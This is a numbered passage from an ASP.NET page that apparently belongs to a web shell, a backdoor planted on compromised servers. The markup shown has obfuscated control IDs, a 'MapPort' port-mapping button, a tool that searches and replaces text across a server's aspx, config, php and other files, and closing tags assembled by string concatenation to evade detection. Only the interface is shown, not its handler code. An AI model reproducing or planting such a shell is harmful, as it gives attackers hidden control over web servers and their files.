2547. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
2548. <%--Search--%>
2549. <div id="yhv" runat="server">
2550. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2551. <tr align="center">
2552. <td style="width:20%" align="left">Keyword</td>
2553. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2554. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
2555. </tr>
2556. <tr align="center">
2557. <td style="width:20%" align="left">Replace As</td>
2558. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
2559. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
2560. </tr>
2561. <tr align="center">
2562. <td style="width:20%" align="left">Search FileType</td>
2563. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
2564. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
2565. </tr>
2566. <tr align="center">
2567. <td style="width:20%" align="left">Path</td>
2568. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
2569. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
2570. </tr>
2571. </table>
2572. <br/>
2573. <br/>
2574. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
2575. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
2576. </asp:Table>
2577. </div>
2578. </td></tr></table>
2579. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;"></div></div>
2580. </form>
2581. <%="<"+"/"+"B"+"O"+"D"+"Y"+">"+"<"+"/"+"H"+"T"+"M"+"L"+">"%>